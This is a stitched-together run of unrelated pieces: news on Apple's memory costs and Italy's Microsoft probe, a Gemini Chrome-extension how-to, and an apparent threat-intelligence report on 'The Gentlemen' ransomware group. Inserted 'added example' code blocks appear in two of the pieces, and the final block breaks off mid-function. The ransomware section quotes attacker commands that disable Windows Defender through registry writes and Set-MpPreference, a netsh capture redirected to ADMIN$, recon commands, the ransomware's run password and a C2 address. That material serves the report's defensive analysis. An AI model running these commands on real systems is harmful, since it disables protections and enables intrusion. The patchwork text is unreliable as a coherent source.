Apple’s memory problem is your problem, too
Apple’s ongoing problems with RAM shortages and higher prices won’t be solved anytime soon, because rapidly accelerating demand for high-end AI memory is devouring the consumer electronics industry.
GoPro has already warned it might go out of business — and the scale of the crunch has prompted analysts to call it an “absolute existential crisis” for smaller tech firms.
An endless night

The whole issue might get worse. Noted Apple analyst Ming-Chi Kuo believes the supply/demand crisis will deepen through 2027. He expects that up to 20% of the memory manufacturing capacity currently serving consumer electronics could be diverted to feed data centers in the coming year. That’s a message of doom to smaller firms, and the Android market will be eaten up.
It’s lazy thinking to see Apple as a villain in this scenario. The company might have been charging more for add-on memory than market rates, but there were real technical reasons to do so. And while critics might be castigating Cupertino for those past practices, they will still find themselves paying more for whatever brand of device they use to write those screeds on in future.
It’s all about supply and demand. Memory manufacturers see the opportunity to feed AI need, even if it means sacrificing consumer markets as they do.
Cash through chaos

You can argue that the consequences of that decision are unethical. Should memory makers have considered the consequence of curtailed supply on their existing markets? After all, every business, every school, and almost every consumer is now a digital entity, and the massive increase in PC, smartphone, and other consumer electronics prices will have a consequential impact across all layers of society.
It generates yet another inflationary pressure (as if more is needed) on the global economy, and the decision to further limit supply of consumer electronics memory could be seen as corporate irresponsibility. That’s partly why a class action against the big three memory makers (Samsung, SK Hynix, and Micron) has been filed in California. Between them, those three firms control around 90% of global memory supply, giving the trio colossal market power.
It’s a real power imbalance.
This is market power

GoPro is typical; as a smaller vendor, there isn’t much it can do to save itself. Apple has more clout, so it might be able to forge a way forward. But even then, it’s rowing against what CEO Tim Cook has already called “a hundred-year flood.”
So even if the company can convince the Trump Administration to let it secure memory from currently embargoed Chinese manufacturer ChangXin Memory Technologies, the move is unlikely to ease the pressure much at all. “Tim Cook is one of the few tech leaders who can still navigate both Washington and Beijing, so this is better handled before he steps down as CEO,” wrote Ming-Chi Kuo. That’s true, though Cook will continue “engaging with policy makers” once he takes on his new role as executive chairman of Apple’s board of directors in September.
Apple will likely also be speaking with partners to explore the possibility of investing in additional fabrication plants together (or building its own, given it has its own stable of experts quite capable of doing so). But even if those talks come to something, it will be years before they enter operation. Sadly, manufacturing investment from the existing big memory firms seems focused on data centers.
The shortage will continue until morale improves

What happens now? Short of any direct intervention to change the situation, memory prices will continue to accelerate. Jefferies Equity Research warns they will rise up to 50% in Q3 and an additional 30% to 40% by the end of 2026. They’ll also continue to increase next year, by which time some new production capacity might begin to come on stream.
The scale of these price increases means no one can know whether Apple’s most recent product price increases (and the looming iPhone price increases in fall) will cover the full extent of the anticipated memory price hike.
Will we see prices fall if memory price inflation eases off? History says we’re unlikely to see AI-flation go in reverse, but it’s not completely impossible. Meanwhile, businesses everywhere will struggle with unexpected hardware cost increases that are impossible to plan for. You can also anticipate some smaller vendors exiting the market, leaving companies who might have deployed those products across their business exposed, as software updates and hardware repairs will cease.
Yes, AI has already changed the world – it’s more expensive

They told us AI would change the world. It appears to be doing so by making everything more expensive.
While there will still be opportunity to generate cash through this chaos, it’s far from delivering the kind of stable, business-friendly environment most governments rely on to balance their books. In the end, all of this calls to mind the 2002 DRAM price fixing scandal, the only difference being that the consequences are much greater in this digital-everything age.
Please join me on social media at BlueSky, LinkedIn, or Mastodon, and do subscribe to my daily human-curated Apple news headline summary on Substack.
Italian watchdog probes Microsoft as M365 price change looms
Italy’s competition watchdog has opened an investigation into Microsoft over concerns it may not have clearly informed consumers about the integration of Copilot and Designer into Microsoft 365 subscriptions, associated price increases, and automatic upgrades to higher-cost plans.
The Italian Competition Authority (AGCM), in a statement to the press, said it had opened an investigation into Microsoft S.r.l., the vendor’s Italian subsidiary, and Microsoft Ireland Operations Ltd. to assess whether the way the changes to M365 pricing were communicated may have unduly restricted consumers’ freedom of choice.
Although the AGCM’s announcement does not explicitly identify the pricing event under investigation, its description aligns with Microsoft’s January 2025 rollout of Copilot and Designer for Microsoft 365 Personal and Family subscribers.
At the time, Microsoft announced its first price increase for the consumer subscriptions since the launch of Copilot and Designer, stating that existing subscribers would pay the higher price at their next renewal after the AI features were added.
Could scrutiny spread beyond Italy?

The Italian probe is not the first time Microsoft’s communication around AI-related Microsoft 365 pricing has drawn regulatory attention.
The investigation follows earlier scrutiny of Microsoft’s consumer pricing communications in Australia and New Zealand, where Microsoft apologized and revised some of its messaging after regulators raised concerns over how AI-enabled Microsoft 365 subscriptions were presented to customers.
That episode could prove relevant for the current investigation, even though the legal frameworks differ, said Pareekh Jain, principal analyst at Pareekh Consulting.
“Microsoft’s apology and revised communications show similar concerns were raised before,” the analyst said.
“While the legal cases differ, Italian regulators may see it as evidence that clearer customer communication was already known to be necessary,” he added.
Jain also expects regulators elsewhere to watch the outcome of the Italian investigation: “Regulators in the EU, UK, Australia, New Zealand, and Canada are likely to watch closely, especially where AI is bundled into existing subscriptions with higher prices or automatic renewals.”
Enterprise buyers are likely to scrutinize AI pricing more closely

Whether the Italian investigation ultimately results in penalties against Microsoft remains to be seen, but analysts say the probe could have an impact on M365 commercial plans, which are separate and set to take effect on July 1.
The investigation serves as a reminder for enterprises to examine AI-related price changes even if Microsoft’s commercial licensing process seems more transparent than its consumer subscription model, Jain said. “CIOs should still verify what is changing at renewal and whether AI features are optional.”
Enterprise procurement teams should ask tougher questions during negotiations, said Bhupendra Chopra, chief revenue officer at IT consulting firm Kanerika.
“Procurement teams should ask questions, such as what AI am I paying for, can I see it itemized, and can I decline it without losing the rest? Buyers would be right to want AI pricing written into renewal terms with clear opt-outs and price protection,” Chopra said.
These questions, according to Jain, could provide additional leverage during licensing discussions to negotiate flexible terms.
However, Chopra pointed out that the investigation is symptomatic of a broader tension between software vendors’ efforts to integrate AI into existing products and regulators’ expectations around transparency and customer choice.
“Building AI into existing products and pricing it in is becoming standard across software, not unique to one vendor. Regulators are testing an old question against a new feature — whether buyers were given clear information and a real choice,” he said.
For enterprises, he added, the practical takeaway is straightforward: “Expect AI to show up inside the tools you already own, expect it to carry a cost, and review what each renewal actually includes. Treated as routine cost discipline, it stops being a surprise.”
Microsoft said it is committed to complying with Italian consumer law and will cooperate with the Italian Competition Authority in its preliminary investigation.
Oh, behave! How Gemini can reshape the web for the way you work
Reading about the “revolutionary” nature of generative AI technology these days, it’s hard not to feel a little left out.
Sure, services like Google’s Gemini and its contemporaries can be useful in certain limited, specific areas for productivity purposes. But working with them can also be pretty disheartening and overwhelming — from prompt fatigue and an onslaught of AI workslop to the fear of lost jobs and even just the simple inconsistencies and inaccuracies these systems are so prone to providing. (And that’s to say nothing of the ever-increasing creepy factor that often accompanies this type of technology.)
More and more, it seems the most significant impact of these systems is in areas like coding, where AI is allowing ambitious tech-heads to create their own custom programs with limited to no programming knowledge (but a lot of time, vision, and patience) — as well as allowing accomplished coders to produce products more quickly by letting AI do the dirty work and then spending their time guiding, tweaking, and correcting its output.
That’s all well and good, but the reality is that most of us mere mortals are never gonna mess with anything that daunting. That doesn’t, however, mean we can’t enjoy a slice of the custom-coding pie and the productivity advantages it offers — on a much simpler but still supremely useful level.
The average-worker answer lies in an oft-overlooked middle-ground possibility these AI chatbots possess to help us create relatively basic but extremely high-potential custom browser extensions. As their name suggests, these simple little programs run entirely in your browser — the same exact sorts of add-ons you’d typically find and install in a marketplace like Google’s Chrome Web Store.
But with Gemini or any other similar genAI platform, you can dream up your own web-improving extension and turn it into reality in a matter of minutes — simply by describing your goal and then guiding the AI gently along the way. And given how much time most of us spend on the web these days, that opens up a tantalizing series of doors for taking total control of your work environment.
Hate all the extraneous bells and whistles gunking up the Google Docs interface? Gemini can create a Chrome extension that removes them. Annoyed by a glitchy web app? Ask Gemini for an extension that makes some under-the-hood improvements. The possibilities are endless.
Let me show you how exactly it works, how easy it is to approach and master, and how many work-enhancing possibilities are out there just waiting to be created.
The ins and outs of Gemini’s custom Chrome extensions

First things first: You don’t need any special tools or subscriptions to make this happen. For the purposes of this article, we’ll focus on Google’s Gemini for the creation and the standard desktop Chrome browser for the installation — but the same basic process would work with most any AI chatbot, if you happen to prefer ChatGPT or Claude, as well as with any extension-supporting, Chromium-compatible browser (a list that includes everything from Microsoft Edge to Brave, Vivaldi, and beyond).
Google offers a dizzying array of Gemini modes and options and an equally overwhelming series of AI subscription plans that control how much you can use those capabilities, but you don’t need to worry about any of that to create custom Chrome extensions. You might sometimes see better results if you switch your Gemini model to “Pro” or your Gemini thinking level to “Extended” — designations that even Gemini itself has trouble deciphering (believe me, I asked!) — but just using the default Gemini settings with a free Google account will generally work quite well.
Getting going with a custom Chrome extension is as simple as opening up a new Gemini chat and telling the system what you want it to cook up for you. The hardest part is deciding what you want and what’d be helpful for you — something we’ll explore more in a moment, via specific examples and suggestions. Once you’ve got that, you can just ask Gemini to create a Chrome extension that’ll accomplish what you’re envisioning, with as much specificity as possible about what it’ll do and how it’ll look.
Gemini will spit back a series of plain-text code chunks with instructions to copy each cluster and paste it into a new plain text file with a certain specific name — things like “manifest.json,” “content.js,” and “styles.css.” All you’ll do is use the on-screen button to copy each segment, then open up any simple text editor (like Windows Notepad, macOS TextEdit, or any number of simple online text editors) and paste the text in, then save it under the name Gemini gives you.
You’ll need to put all the files into a single isolated folder on your computer, and then you can go into Chrome, type chrome://extensions into its address bar, and install your shiny new creation by:
- Flipping the toggle next to “Developer mode” in the upper-right corner of the screen into the on and active position, if it isn’t already
- Clicking the “Load unpacked” button
- And selecting the folder you just created in the pop-up that appears
Chrome’s “Developer Mode” toggle and “Load unpacked” button are the keys to importing any extension you create.
JR Raphael / Foundry
And that’s pretty much it: No complicated compiling or program publishing — the extension you envisioned will be alive and working right in your browser and ready to use.
Now, odds are, it won’t be exactly what you wanted in its first iteration, and you’ll have to go back to Gemini to request several rounds of updates and corrections. Each time, Gemini will create a new set of code chunks, and you simply overwrite the text in each file with its corresponding new code chunk.
It’s still a bit of a process. But you’ll rarely spend more than an hour on something simple and maybe a few hours on something especially multifaceted and specific, and whatever you create will then work to your advantage indefinitely from that point onward, on any computer where you install it.
Before we dive into specific slivers of inspiration, let’s just note the hopefully obvious asterisk that this’ll work only if you’re either (a) using a personal computer that isn’t associated with an organization or (b) using a work-connected computer where custom Chrome extensions are permitted. In either scenario, use your own best judgment to ensure that whatever you’re adding into your browser won’t expose any corporate data or cause your IT comrades any alarm if they see you using it in your workday. Keep in mind that an extension loaded through Developer mode skips the Chrome Web Store’s review entirely, and its content script can read and change everything on every page its manifest matches, so keep those matches limited to the one site you’re restyling.
With most common examples, though — including all the ones we’re about to go over — you shouldn’t have any problem or cause for concern.
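Whatever Gemini hands back, read its manifest.json before you load it: that file decides which sites the content script is injected into and which browser APIs the extension can call, and nothing in the “Load unpacked” flow reviews it for you. The checker below is an added example, not the author’s Docs Zen code or anything Gemini produced; both sample manifests are constructed, the extension name and file names are placeholders, and the permission list is the set of Chrome extension APIs that reach well beyond restyling a single page.

```python
import json

# Constructed sample: a tightly scoped "interface fixer" manifest (Manifest V3).
# Name, file names and the match pattern are placeholders, not a real extension.
SCOPED_MANIFEST = json.loads("""
{
  "manifest_version": 3,
  "name": "Docs Zen (hypothetical)",
  "version": "0.1",
  "content_scripts": [
    { "matches": ["https://docs.google.com/document/*"],
      "js": ["content.js"], "css": ["styles.css"] }
  ],
  "permissions": ["storage"]
}
""")

# Constructed sample: what an over-eager generator might hand you for the same job.
BROAD_MANIFEST = json.loads("""
{
  "manifest_version": 3,
  "name": "Docs Zen (hypothetical, over-broad)",
  "version": "0.1",
  "host_permissions": ["<all_urls>"],
  "permissions": ["storage", "tabs", "cookies", "webRequest", "nativeMessaging"],
  "content_scripts": [
    { "matches": ["*://*/*"], "js": ["content.js"] }
  ]
}
""")

# Permissions that let an extension read every tab, session cookies, all HTTP
# traffic, browsing history, downloads, or talk to native programs on the host.
SENSITIVE_PERMISSIONS = {
    "tabs", "cookies", "webRequest", "webRequestBlocking", "nativeMessaging",
    "history", "debugger", "management", "clipboardRead", "downloads", "proxy",
}
# Match patterns that cover every site instead of the one being restyled.
BROAD_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def audit_manifest(manifest: dict) -> list[str]:
    """Return human-readable findings; an empty list means the manifest stays scoped."""
    findings = []
    if manifest.get("manifest_version") != 3:
        findings.append("manifest_version is not 3 (Manifest V2 is deprecated in Chrome)")
    for pattern in manifest.get("host_permissions", []):
        if pattern in BROAD_PATTERNS:
            findings.append(f"host_permissions grants every site: {pattern}")
    for perm in manifest.get("permissions", []):
        if perm in SENSITIVE_PERMISSIONS:
            findings.append(f"sensitive API permission requested: {perm}")
    for i, script in enumerate(manifest.get("content_scripts", [])):
        for pattern in script.get("matches", []):
            if pattern in BROAD_PATTERNS:
                findings.append(f"content_scripts[{i}] injects into every site: {pattern}")
    return findings


def audit_file(path: str) -> list[str]:
    """Audit the manifest.json inside an unpacked extension folder."""
    with open(path, encoding="utf-8") as fh:
        return audit_manifest(json.load(fh))


if __name__ == "__main__":
    for label, manifest in (("scoped", SCOPED_MANIFEST), ("broad", BROAD_MANIFEST)):
        print(label, audit_manifest(manifest) or ["no findings"])
```

Point audit_file at the folder you are about to load; no findings means the extension only touches the site you asked for. If a generated manifest asks for <all_urls>, tabs or cookies to tidy up Google Docs, the right move is to tell Gemini to narrow it, not to flip Developer mode on anyway.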
Capisce? Capisce. Let’s get into it.
Custom extension category #1: The interface fixer

Our first custom Chrome extension category is the one that won me over to this practice initially and has done the most to reshape my own browser-based workflow — and that’s the simple-seeming but transformational ability to have AI remake any web app you rely on to remove unneeded elements and redesign the interface to your exact specifications.
The best example I can show you is what I did with my completely homemade, Gemini-created Docs Zen extension. Google Docs, to put it mildly, has devolved into a cluttered mess. There are so many on-screen elements I never use and, ironically enough, irrelevant AI elements I’d rather not have in my hair. I just want a calm, simple, minimalist environment for writing — with Google’s second-to-none syncing, universal access, and collaboration systems beneath it.
So rather than try to reinvent the wheel, I described to Gemini all the elements I wanted to remove from Docs and all the ways I wanted to rethink how its interface appeared for me.
My original request to Gemini, followed by rounds of expansions and revisions (and eventually also a more poetic name).
JR Raphael / Foundry
I went back and forth with numerous iterations and kept coming up with interesting new additions to further flesh out and improve the experience — and I ended up with a delightful setup that gives me a distraction-free view of my writing space with a simple toggle to reveal the main Docs menus and a palette icon that allows me to switch from one eye-pleasing theme to another.
Google Docs with my custom Docs Zen extension — a true delight for daily writing.
JR Raphael / Foundry
My setup deliberately doesn’t include comments or other collaborative elements, as I’m mostly writing by myself these days — but when I do need those elements, the eye icon in the upper-right corner of the screen disables my custom adjustments and takes me back to the standard Docs interface. I can then click the eye icon again in that environment to switch back.
My custom extension includes a simple on-off toggle for times when I need the full Docs setup.
JR Raphael / Foundry
I used Gemini to create something similar for Trello, with which I also have a love-hate relationship — loving the foundational functions and easy access everywhere but hating the interface that’s lost focus, gained bloat, and gotten noticeably clunky and slow over time.
With the same sort of step-by-step, plain-English guidance, I was able to transform Trello from this…
Trello, in its typical current-day state.
JR Raphael / Foundry
…into this:
Trello, with my custom modifications in place.
JR Raphael / Foundry
I couldn’t even begin to recount the number of superfluous features and elements I’ve removed, along with revamping the overall interface to make it both more efficient and more visually pleasing to my eye.
Whether it’s a web app you rely on regularly or even just a website you open often, the possibilities are practically endless for the ways you can reshape it and mold it to make it work better for you.
Speaking of which…
Custom extension category #2: The feature creator

In addition to the surface-level adjustments and feature removals in my aforementioned Trello-enhancing extension, I also added in several components — such as one-click buttons for archiving or moving cards — and I managed to speed up the site by making some under-the-hood adjustments Gemini suggested when I asked about its choppy performance. The same sort of concept can apply to any web-based interface you’re using, if there are any options that are annoyingly buried within menus, shortcuts that’d make your life easier, or other improvements you’ve longed to see.
You can also consider some simple standalone extensions for giving yourself on-demand features that aren’t necessarily associated with any one specific website but could be useful in plenty of productivity scenarios. For instance:
- I do a fair amount of basic image editing and frequently find myself needing to reference a hex color code that corresponds with a particular brand color, and I always end up having to open up a new tab and look in a note somewhere to find the code I need. Well, no more: I used Gemini to create a super-simple custom color code pop-up where I can store all the colors I need and then copy any of ’em onto my clipboard with a single click. Major time-saver.
All the color codes I need are now never more than a couple clicks away.
JR Raphael / Foundry
- I’m also constantly converting time zones, either for meetings with clients or colleagues or for trying to wrap my head around publishing systems that insist on using random time zones with no meaning to me. It’s infinitely easier for me to manage now, thanks to the custom Chrome extension I made that shows the current time in all the zones I need most often — as well as allowing me to put any other time into any field and have all the other zones instantly adjust to match. It also offers a brilliant plain-text conversion box where I can just type things like “1pm-3pm PT in MT” and have it cough back up an instant answer for any conversion I need.
My custom time zone conversion extension comes in handy countless times a day.
JR Raphael / Foundry
Maybe what you want is the ability to interact with data on different websites more easily — to be able to save any table on a page in front of you as a CSV file, mayhap, or even to save any text you highlight on a page into a new Google Docs document. Whatever the case may be, Gemini can handle it — and that superpower that you’ve always wished for but never found the right tool to make possible can actually now be yours.
Custom extension category #3: The browser expander

Our final category of custom Chrome extensions to consider moves beyond the web itself and into your actual browser. The browser is essentially the modern-day desktop, after all — and for the first time now, you can expand and enhance it in all sorts of interesting ways.
Some specific examples, to get your brain-motor whirring:
- You could walk Gemini through creating a smart auto-snooze system for your open browser tabs, both to clear clutter and help with Chrome’s performance. It could save any tab that hasn’t been touched in a certain amount of time to your local storage and then give you a simple searchable “Archive Dashboard” where you can find all those auto-closed tabs and re-open ’em as needed.
- With the right guidance, Gemini could give you a custom browser research panel — where any info you highlight on a page gets beamed over into a sidebar-style panel that serves as a running scratchpad of notes from the day.
- Or, if you find yourself often needing to see two tabs together side by side, you could have Gemini cook up a custom extension that instantly detaches the tab in front of you into a new window, perfectly sized and positioned next to the original. One keyboard shortcut could make that move happen, while another could recombine the two tabs into a single centered window.
As with all the other ideas we’ve gone over, all you’ve gotta do is ask — and now, with the right inspiration in mind, you’re ready to get your custom extension adventures going and start bending the web to your will.
The Gentlemen are knocking: custom backdoors and evolving tactics
This year saw the emergence of The Gentlemen, a prominent example of a group operating under the ransomware-as-a-service (RaaS) model. Although our initial assessment suggested the group first appeared in mid-2025, it actually started ramping up its activities at the beginning of 2026. According to public reports, in the first half of 2026, this group ranks among the top 10 ransomware actors by the number of victim announcements on its data leak site (DLS).
We have been observing the activity of The Gentlemen since February 2026 and have discovered new tactics, techniques, and procedures (TTPs) as well as custom tool development efforts, as they target large corporations and critical infrastructure worldwide. In our research, we have uncovered the group’s methods of reconnaissance, network sniffing, and many other techniques that have not been publicly described before by the wider community.
Technical details

Initial infection vector

The Gentlemen group and its affiliates usually get into victim systems by exploiting vulnerabilities in online services and using stolen or weak login credentials, as reported by multiple cybersecurity vendors. They often target devices like hardware VPNs and firewalls that are exposed to the internet, and use leaked or default credentials to gain access.
We believe the group is likely collaborating with other actors or initial access brokers (IABs) to gain access to the target organizations. While they often deploy ransomware within a few hours of obtaining initial access, our analysis of several attacks revealed some cases in which access to the victim’s system had been established long before the ransomware was deployed. These cases involved tactics that are not typically associated with the group. This suggests that the initial breach may not have been executed by The Gentlemen at all, but rather by another group or an initial access broker.
Reconnaissance

Our investigation reveals that The Gentlemen conduct thorough internal reconnaissance using tools like SharpADWS, NetScan, Advanced IP Scanner, and netsh to map the target environment and identify vulnerabilities. SharpADWS is used to gather detailed Active Directory information, including domain object enumeration; because it queries the Active Directory Web Services endpoint (TCP 9389) over SOAP instead of issuing LDAP queries directly, it sidesteps detections that watch LDAP traffic. The group also uses NetScan and Advanced IP Scanner to scan the network, discover active ports and services, and identify potential vulnerabilities, ultimately gaining a deeper understanding of the network and establishing remote control over identified systems.
Microsoft’s netsh tool is used to capture network packets and gather intelligence. The capture is started with

cmd.exe /Q /c netsh trace start capture=yes report=no filemode=circular overwrite=yes maxSize=4 > \\<target IP>\ADMIN$\{RANDOM-FILE-NAME} 2>&1

and stopped with

cmd.exe /Q /c netsh trace stop > \\<target IP>\ADMIN$\{RANDOM-FILE-NAME}

The cmd.exe /Q /c wrapper with output redirected into the ADMIN$ share under a throwaway name is the pattern Impacket-style remote execution tools (wmiexec, smbexec) produce, and is worth hunting for on its own.
The command output lands in that administrative share under a random file name; the packet capture itself is an ETL file written by netsh trace, which has to be converted (Microsoft’s etl2pcapng does this) before tools like Wireshark can analyze it. The decoded traffic can reveal sensitive information such as unencrypted network activity and potential passwords, which the attackers then use to conduct targeted ransomware attacks.
Lateral movement

The Gentlemen group leverages the NETLOGON share to distribute the ransomware executable to domain-joined computers, enabling simultaneous attacks on multiple devices. To facilitate lateral movement, they use a customized PowerShell script, deploy_gpo.ps1, with specific parameters and variables for each target system. Additionally, they employ PsExec to remotely execute the ransomware binary on targeted systems, providing an alternative method for spreading the infection when the GPO-based approach is not feasible.
Disabling security products

The Gentlemen group uses various methods to disable security software on targeted computers, including the BYOVD technique. This involves installing a vulnerable driver and exploiting its weakness to shut down security software, gain unrestricted access, and launch ransomware attacks. We observed the following vulnerable drivers used in the group’s attacks.
Driver name                Description
ProcessMonitorDriver.sys   Safetica DLP and EDR driver
wamsdk.sys                 WatchDog anti-malware driver
gamedriverx64.sys          Fedeen/Hotta studio anti-cheat driver
biontdrv.sys               Paragon partition manager driver
inpoutx64.sys              A legacy driver involved in managing RGB lighting
wsftprm.sys                Topaz anti-fraud software driver
Havoc.sys                  Huawei audio driver

The Gentlemen group also uses open-source tools, including Windows Kernel Explorer and OpenArk64, to disable security software. These tools can intercept and block system calls, and even remove security drivers, allowing the attackers to bypass security measures and remain undetected.
Besides this, the group employs simple methods to disable security software, such as using kavrmvr.exe to uninstall Kaspersky Antivirus, which is prevented by the product’s behavioral detection, and modifying Windows registry settings to disable Windows Defender’s real-time protection.
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableBehaviorMonitoring"=dword:00000001
"DisableOnAccessProtection"=dword:00000001
"DisableScanOnRealtimeEnable"=dword:00000001

Note that on current Windows 10 and 11 builds Microsoft Defender ignores the DisableAntiSpyware policy value, and with Tamper Protection enabled it also refuses the real-time protection changes, so these writes are a useful tampering signal even where they fail to take effect.
Last but not least, the attackers attempt to disable Windows Defender’s real-time monitoring and ransomware protection (controlled folder access) and add the implant to the exclusion list by executing several PowerShell cmdlets, as observed in the Go implant, which we’ll analyze later in this post:

Set-MpPreference -DisableRealtimeMonitoring $true -Force
Set-MpPreference -EnableControlledFolderAccess Disabled -Force
Add-MpPreference -ExclusionProcess <file_name>
Add-MpPreference -ExclusionPath 'C:\\'

Go-based backdoor
We observed a custom-made implant, written in Go and deployed a day before the ransomware attack, which acted as a backdoor, enabling remote command execution. The implant collected system information (hostname, domain name, UUID, and local IP addresses) and organized it into a JSON object using a map structure with the keys name, domain, uuid, and localIPs. To obtain the system’s UUID, it used the WMI query "SELECT UUID FROM Win32_ComputerSystemProduct". It then used the Yamux library to establish a persistent bidirectional TCP connection with the C2 server at 81.177.215[.]15:9443. It sent the collected system info to the C2 and waited for operator responses, executing commands using cmd.exe /c if the response byte was 'c', or establishing a SOCKS proxy connection if the byte was 's'. This functionality likely enables the group’s operators to pivot within the target network and expand their scan coverage.
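To see what that check-in looks like on the wire, here is an added example (not Kaspersky’s or the group’s code) that parses Yamux frames and picks out a client-opened stream carrying the JSON system-info object. The 12-byte header layout comes from the public hashicorp/yamux specification; the sample bytes are constructed and the field values invented, and the assumption that the JSON travels in a single Data frame on the implant’s first stream is mine, since the report only says the object is sent over the Yamux session.

```python
import json
import struct

# Yamux frame header (public hashicorp/yamux spec): 12 bytes, all big-endian.
HEADER = struct.Struct(">BBHII")        # version, type, flags, stream id, length
TYPES = {0: "Data", 1: "WindowUpdate", 2: "Ping", 3: "GoAway"}
FLAGS = {0x1: "SYN", 0x2: "ACK", 0x4: "FIN", 0x8: "RST"}
# Keys the report says the implant puts in its JSON check-in object.
CHECKIN_KEYS = {"name", "domain", "uuid", "localIPs"}


def parse_frames(buf: bytes) -> list:
    """Split buf into (type, flag names, stream id, payload) tuples.

    Only Data frames carry a body; for the other types the length field holds a
    value (window delta, ping nonce, error code) and no bytes follow the header.
    A trailing partial frame is left for the caller to resume on later.
    """
    frames, off = [], 0
    while off + HEADER.size <= len(buf):
        version, ftype, flags, sid, length = HEADER.unpack_from(buf, off)
        if version != 0 or ftype not in TYPES:
            raise ValueError(f"not a yamux frame at offset {off}")
        off += HEADER.size
        payload = b""
        if ftype == 0:
            if off + length > len(buf):
                break
            payload, off = buf[off:off + length], off + length
        names = [name for bit, name in FLAGS.items() if flags & bit]
        frames.append((TYPES[ftype], names, sid, payload))
    return frames


def find_checkin(buf: bytes):
    """Return the JSON check-in object if a client-opened stream carries one.

    Yamux clients open odd-numbered streams and servers even-numbered ones, so a
    check-in that an implant pushes to its operator should sit on an odd stream id.
    """
    for ftype, _flags, sid, payload in parse_frames(buf):
        if ftype != "Data" or sid % 2 == 0:
            continue
        try:
            obj = json.loads(payload)
        except ValueError:
            continue
        if isinstance(obj, dict) and CHECKIN_KEYS.issubset(obj):
            return obj
    return None


def data_frame(sid: int, payload: bytes, flags: int = 0) -> bytes:
    """Build a yamux Data frame (used here only to construct the sample)."""
    return HEADER.pack(0, 0, flags, sid, len(payload)) + payload


# Constructed sample session (values invented): the implant opens stream 1 with a
# SYN window update, sends its check-in, and the session exchanges a ping.
CHECKIN = json.dumps({"name": "WS01", "domain": "corp.example",
                      "uuid": "4C4C4544-0000-2010-8020-80C04F202020",
                      "localIPs": ["10.0.0.12"]}).encode()
SAMPLE_SESSION = (HEADER.pack(0, 1, 0x1, 1, 0)          # WindowUpdate, SYN, stream 1
                  + data_frame(1, CHECKIN)              # Data, stream 1
                  + HEADER.pack(0, 2, 0x1, 0, 0x1234))  # Ping, SYN, stream 0

if __name__ == "__main__":
    for frame in parse_frames(SAMPLE_SESSION):
        print(frame[:3], len(frame[3]), "bytes")
    print("check-in:", find_checkin(SAMPLE_SESSION))
```

Yamux is a legitimate library (HashiCorp tooling and several tunnelling projects use it), so a match is a hunting lead to pair with the destination (81.177.215[.]15:9443 here) rather than a verdict; what the parser buys you is a content-based pivot that survives the operators moving to a new IP or port.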
Given the backdoor implant’s capabilities, such as establishing two-way communication, executing commands, setting up a SOCKS proxy, and gathering information, it’s clear that it can also be used to expand the attack chain as needed. In one incident, soon after the initial connection was made, we saw the server send reconnaissance commands, including:
whoami
net group "Domain Admins" /domain
net group
dir c:\
cd c:\

Go-based ransomware
The most widespread version of the ransomware binary, written in Go, emerged in mid-2025 and has been used in most attacks since then. It features a previously unknown Go obfuscator that renames symbols, source code files, and structures, and alters function signatures, making analysis more difficult. The binary also contains embedded parameters with descriptions, indicating a sophisticated tool. The parameters are listed in the following table:
| Parameter | Description |
|---|---|
| --password | Access password required to run the ransomware; acts as an anti-sandbox technique |
| --path | Comma-separated list of target directories to be encrypted |
| --T | Delay before the encryption starts, specified in minutes |
| --system | A flag to run as SYSTEM, encrypting only local drives |
| --shares | A flag to encrypt only mapped network drives |
| --full | A flag that combines --system and --shares |
| --spread | Lateral movement flag using specified domain credentials (“domain.com\user:pass”) or a single space (” “) to leverage the current session |
| --gpo | A flag to deploy via Group Policy to all domain computers (designed to be executed on a Domain Controller) |
| --silent | Silent mode: skips renaming files, modifying file update times after encryption, and changing the wallpaper |
| --keep | A flag that prevents the executable from self-deleting after the encryption process completes |
| --wipe | A flag that enables wiping free disk space after encryption |
| --no-admin | A flag to force execution without administrative privileges |
| --fast | Speed flag that restricts processing/encryption to 9 percent of the file |
| --superfast | Speed flag that restricts processing/encryption to 3 percent of the file |
| --ultrafast | Speed flag that restricts processing/encryption to 1 percent of the file |

Automated system execution prevention

The Go variant of the ransomware is designed to avoid detection and prevent analysis. To execute, it requires a password, currently set to CbdU8EgF. This password acts as a barrier to prevent the binary from running in sandbox or automated environments. If the incorrect password is entered or no password is provided, the binary will terminate.
Lateral movement through GPO deployment

When the --gpo parameter is used, the ransomware spreads to other computers on the network through Group Policy. To do this, it generates PowerShell commands based on the target environment, writes them to a file called deploy_gpo.ps1 in the %temp% folder, and executes it.
The resulting script allows the attackers to quickly spread the ransomware across the entire company network. It starts by finding the Domain Controller and loading tools to control it. Then, it copies itself to the NETLOGON network folder to become accessible to all computers.
To prevent the attack from being blocked, the script creates a fake system update policy that disables Windows Defender. It does this by setting DisableRealtimeMonitoring to 1 on all connected computers, thereby disabling real-time scanning and related security features. The script also sets up a hidden scheduled task by creating a ScheduledTasks.xml file in the SYSVOL directory and modifies the Active Directory attribute gPCMachineExtensionNames to register the malicious XML file. Finally, the script forces every computer on the network to refresh Group Policy immediately by running gpupdate /force, causing all of them to download and run the ransomware simultaneously.
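A defender reviewing a GPO for the deployment pattern just described can check the two artifacts the post names: the gPCMachineExtensionNames attribute, which must register the Scheduled Tasks preference extension before a ScheduledTasks.xml is applied by clients, and the XML file itself. The Python below is an added example written for this post, not Kaspersky’s code and not the group’s script. The two GUIDs are the publicly documented Group Policy Preferences Scheduled Tasks extension identifiers (they do not appear in the post), and the attribute value and XML are constructed samples modelled on the GPP format, with a made-up task name, domain and share path.

```python
import re
import xml.etree.ElementTree as ET

# Publicly documented GUIDs of the Group Policy Preferences "Scheduled Tasks"
# client-side extension and its tool extension (not taken from the post).
SCHEDULED_TASKS_CSE = "{AADCED64-746C-4633-A97C-D61349046527}"
SCHEDULED_TASKS_TOOL = "{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}"

GUID = r"\{[0-9A-F-]{36}\}"
# gPCMachineExtensionNames is a sequence of "[{CSE}{tool}{tool}...]" groups.
GROUP_RE = re.compile(r"\[(" + GUID + r")((?:" + GUID + r")+)\]", re.I)


def parse_extension_names(value):
    """Map each registered CSE GUID to the tool GUIDs listed after it."""
    registered = {}
    for m in GROUP_RE.finditer(value):
        tools = re.findall(GUID, m.group(2), re.I)
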